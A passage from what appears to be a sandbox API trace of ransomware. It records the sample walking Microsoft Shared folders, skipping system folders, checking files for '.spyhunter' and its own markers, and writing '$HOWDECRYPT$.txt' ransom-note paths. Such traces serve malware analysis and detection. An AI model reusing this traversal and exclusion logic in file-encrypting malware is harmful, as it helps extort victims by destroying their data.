lpString2="$Recycle.bin") returned 1 [0087.308] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.308] lstrcmpiW (lpString1="tpcps.dll", lpString2="System Volume Information") returned 1 [0087.308] lstrlenW (lpString="System Volume Information") returned 25 [0087.308] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll") returned 64 [0087.308] StrStrIW (lpFirst="tpcps.dll", lpSrch=".spyhunter") returned 0x0 [0087.308] lstrcmpW (lpString1="tpcps.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.308] lstrcmpW (lpString1="tpcps.dll", lpString2="_uninstalling_.png") returned 1 [0087.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll") returned 64 [0087.309] GetProcessHeap () returned 0x2c0000 [0087.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc2) returned 0x358880 [0087.309] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa80) returned 0x3867e8 [0087.309] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.309] lstrcmpiW (lpString1="tr-TR", lpString2="Windows") returned -1 [0087.309] lstrlenW (lpString="Windows") returned 7 [0087.309] lstrcmpiW (lpString1="tr-TR", lpString2="$Recycle.bin") returned 1 [0087.309] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.309] lstrcmpiW (lpString1="tr-TR", lpString2="System Volume Information") returned 1 [0087.309] lstrlenW (lpString="System Volume Information") returned 25 [0087.309] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR") returned 60 [0087.309] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0087.309] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0087.309] GetProcessHeap () returned 0x2c0000 [0087.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.309] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*") returned 62 [0087.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.310] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.310] lstrlenW (lpString="Windows") returned 7 [0087.310] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.310] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.310] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.310] lstrlenW (lpString="System Volume Information") returned 25 [0087.310] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\.") returned 62 [0087.310] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.310] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.310] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.310] lstrlenW (lpString="Windows") returned 7 [0087.310] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.310] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.310] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.310] lstrlenW (lpString="System Volume Information") returned 25 [0087.310] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\..") returned 63 [0087.310] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.310] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.311] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.311] lstrlenW (lpString="Windows") returned 7 [0087.311] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.311] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.311] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.311] lstrlenW (lpString="System Volume Information") returned 25 [0087.311] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui") returned 76 [0087.311] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.311] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.311] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.311] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui") returned 76 [0087.311] GetProcessHeap () returned 0x2c0000 [0087.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373e78 [0087.311] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa88) returned 0x3867e8 [0087.311] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.311] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.311] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\$HOWDECRYPT$.txt") returned 77 [0087.311] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\$HOWDECRYPT$.txt") returned 77 [0087.311] GetProcessHeap () returned 0x2c0000 [0087.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373f60 [0087.312] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa90) returned 0x3867e8 [0087.312] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.312] lstrcmpiW (lpString1="uk-UA", lpString2="Windows") returned -1 [0087.312] lstrlenW (lpString="Windows") returned 7 [0087.312] lstrcmpiW (lpString1="uk-UA", lpString2="$Recycle.bin") returned 1 [0087.312] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.312] lstrcmpiW (lpString1="uk-UA", lpString2="System Volume Information") returned 1 [0087.312] lstrlenW (lpString="System Volume Information") returned 25 [0087.312] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA") returned 60 [0087.312] lstrcmpW (lpString1="uk-UA", lpString2=".") returned 1 [0087.312] lstrcmpW (lpString1="uk-UA", lpString2="..") returned 1 [0087.312] GetProcessHeap () returned 0x2c0000 [0087.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.312] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*") returned 62 [0087.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.313] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.313] lstrlenW (lpString="Windows") returned 7 [0087.313] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.313] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.313] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.313] lstrlenW (lpString="System Volume Information") returned 25 [0087.313] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\.") returned 62 [0087.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.313] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.313] lstrlenW (lpString="Windows") returned 7 [0087.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.313] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.313] lstrlenW (lpString="System Volume Information") returned 25 [0087.313] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\..") returned 63 [0087.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.313] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.313] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.313] lstrlenW (lpString="Windows") returned 7 [0087.313] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.314] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.314] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.314] lstrlenW (lpString="System Volume Information") returned 25 [0087.314] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui") returned 76 [0087.314] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.314] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.314] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.314] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui") returned 76 [0087.314] GetProcessHeap () returned 0x2c0000 [0087.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x374048 [0087.314] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa98) returned 0x3867e8 [0087.314] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.314] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.314] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\$HOWDECRYPT$.txt") returned 77 [0087.314] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\$HOWDECRYPT$.txt") returned 77 [0087.314] GetProcessHeap () returned 0x2c0000 [0087.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x374130 [0087.314] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaa0) returned 0x3867e8 [0087.314] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.314] lstrcmpiW (lpString1="zh-CN", lpString2="Windows") returned 1 [0087.314] lstrlenW (lpString="Windows") returned 7 [0087.314] lstrcmpiW (lpString1="zh-CN", lpString2="$Recycle.bin") returned 1 [0087.315] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.315] lstrcmpiW (lpString1="zh-CN", lpString2="System Volume Information") returned 1 [0087.315] lstrlenW (lpString="System Volume Information") returned 25 [0087.315] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN") returned 60 [0087.315] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0087.315] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0087.315] GetProcessHeap () returned 0x2c0000 [0087.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.315] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*") returned 62 [0087.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.316] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.316] lstrlenW (lpString="Windows") returned 7 [0087.316] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.316] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.316] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.316] lstrlenW (lpString="System Volume Information") returned 25 [0087.316] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\.") returned 62 [0087.316] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.316] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.316] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.316] lstrlenW (lpString="Windows") returned 7 [0087.316] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.316] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.316] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.316] lstrlenW (lpString="System Volume Information") returned 25 [0087.316] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\..") returned 63 [0087.317] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.317] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.317] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.317] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.317] lstrlenW (lpString="Windows") returned 7 [0087.317] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.317] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.317] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.317] lstrlenW (lpString="System Volume Information") returned 25 [0087.317] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui") returned 76 [0087.317] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.317] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.317] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.317] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui") returned 76 [0087.317] GetProcessHeap () returned 0x2c0000 [0087.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x374218 [0087.317] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaa8) returned 0x3867e8 [0087.317] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.317] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.317] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\$HOWDECRYPT$.txt") returned 77 [0087.317] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\$HOWDECRYPT$.txt") returned 77 [0087.317] GetProcessHeap () returned 0x2c0000 [0087.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x374300 [0087.317] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xab0) returned 0x3867e8 [0087.318] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.318] lstrcmpiW (lpString1="zh-TW", lpString2="Windows") returned 1 [0087.318] lstrlenW (lpString="Windows") returned 7 [0087.318] lstrcmpiW (lpString1="zh-TW", lpString2="$Recycle.bin") returned 1 [0087.318] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.318] lstrcmpiW (lpString1="zh-TW", lpString2="System Volume Information") returned 1 [0087.318] lstrlenW (lpString="System Volume Information") returned 25 [0087.318] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW") returned 60 [0087.318] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0087.318] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0087.318] GetProcessHeap () returned 0x2c0000 [0087.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.318] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*") returned 62 [0087.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.318] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.319] lstrlenW (lpString="Windows") returned 7 [0087.319] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.319] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.319] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.319] lstrlenW (lpString="System Volume Information") returned 25 [0087.319] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\.") returned 62 [0087.319] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.319] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.319] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.319] lstrlenW (lpString="Windows") returned 7 [0087.319] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.319] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.319] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.319] lstrlenW (lpString="System Volume Information") returned 25 [0087.319] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\..") returned 63 [0087.319] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.319] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0087.319] lstrlenW (lpString="Windows") returned 7 [0087.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0087.319] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0087.319] lstrlenW (lpString="System Volume Information") returned 25 [0087.319] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 76 [0087.319] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0087.319] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.319] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0087.319] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 76 [0087.319] GetProcessHeap () returned 0x2c0000 [0087.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3743e8 [0087.320] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xab8) returned 0x3867e8 [0087.320] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.320] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.320] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\$HOWDECRYPT$.txt") returned 77 [0087.320] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\$HOWDECRYPT$.txt") returned 77 [0087.320] GetProcessHeap () returned 0x2c0000 [0087.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3744d0 [0087.320] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xac0) returned 0x3867e8 [0087.320] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0087.320] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0087.320] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\$HOWDECRYPT$.txt") returned 71 [0087.320] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\$HOWDECRYPT$.txt") returned 71 [0087.320] GetProcessHeap () returned 0x2c0000 [0087.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x324560 [0087.320] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xac8) returned 0x3867e8 [0087.322] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0087.322] lstrcmpiW (lpString1="MSClientDataMgr", lpString2="Windows") returned -1 [0087.322] lstrlenW (lpString="Windows") returned 7 [0087.322] lstrcmpiW (lpString1="MSClientDataMgr", lpString2="$Recycle.bin") returned 1 [0087.322] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.322] lstrcmpiW (lpString1="MSClientDataMgr", lpString2="System Volume Information") returned -1 [0087.322] lstrlenW (lpString="System Volume Information") returned 25 [0087.322] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr") returned 66 [0087.322] lstrcmpW (lpString1="MSClientDataMgr", lpString2=".") returned 1 [0087.322] lstrcmpW (lpString1="MSClientDataMgr", lpString2="..") returned 1 [0087.322] GetProcessHeap () returned 0x2c0000 [0087.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0087.322] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*") returned 68 [0087.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0087.335] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.335] lstrlenW (lpString="Windows") returned 7 [0087.335] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.335] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.335] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.335] lstrlenW (lpString="System Volume Information") returned 25 [0087.335] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\.") returned 68 [0087.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.335] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.335] lstrlenW (lpString="Windows") returned 7 [0087.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.335] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.335] lstrlenW (lpString="System Volume Information") returned 25 [0087.335] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\..") returned 69 [0087.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.335] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.335] lstrcmpiW (lpString1="MSCDM.DLL", lpString2="Windows") returned -1 [0087.335] lstrlenW (lpString="Windows") returned 7 [0087.335] lstrcmpiW (lpString1="MSCDM.DLL", lpString2="$Recycle.bin") returned 1 [0087.336] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.336] lstrcmpiW (lpString1="MSCDM.DLL", lpString2="System Volume Information") returned -1 [0087.336] lstrlenW (lpString="System Volume Information") returned 25 [0087.336] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 76 [0087.336] StrStrIW (lpFirst="MSCDM.DLL", lpSrch=".spyhunter") returned 0x0 [0087.336] lstrcmpW (lpString1="MSCDM.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.336] lstrcmpW (lpString1="MSCDM.DLL", lpString2="_uninstalling_.png") returned 1 [0087.336] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 76 [0087.336] GetProcessHeap () returned 0x2c0000 [0087.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x374130 [0087.336] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa98) returned 0x3867e8 [0087.337] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0087.337] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0087.337] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\$HOWDECRYPT$.txt") returned 83 [0087.337] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\$HOWDECRYPT$.txt") returned 83 [0087.337] GetProcessHeap () returned 0x2c0000 [0087.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x329188 [0087.337] RtlReAllocateHeap 